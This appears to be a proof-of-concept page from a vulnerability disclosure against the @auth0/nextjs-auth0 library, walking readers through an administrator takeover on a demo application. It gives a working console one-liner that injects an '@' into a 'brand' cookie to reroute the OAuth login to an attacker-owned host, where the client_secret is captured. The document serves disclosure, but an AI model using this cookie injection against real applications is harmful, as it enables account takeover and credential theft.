Signing in as an administrator without a password
This host is the attacker in a report filed against @auth0/nextjs-auth0. Everything below runs in your own browser against a demo application. No account needed.
1 Sign in to the target the normal way
Open f11-app.huntland.abiusx.com and press Sign in. Use the demo account:
alice@corp.example Sunflower-Ladder-91
You land on the portal as Alice Weber, role user. Open the Admin console and the application answers 403, because Alice is not an administrator. Press Log out before continuing.
2 Confirm you cannot reach the administrator account
Press Sign in again and try admin@corp.example with any password you like. The login server rejects it. The administrator password exists only inside that server and is never handed out.
3 Now take the administrator account
On the target's tab, open DevTools, then the Console, and paste this one line:
document.cookie = "brand=" + encodeURIComponent("@f11-idp.huntland.abiusx.com\\") + "; path=/"
Press Sign in. No password is asked for. You arrive as Priya Raman, role admin, and the Admin console opens.
4 Read what the target sent me
The sign-in above routed the target's login through this server. Open /captured to see the target's OAuth client_secret arriving here. That credential is shared by every user of the application.
auth.<brand>.huntland.abiusx.com, so the value should never be able to leave that suffix. The @ moves the hostname to a domain I own.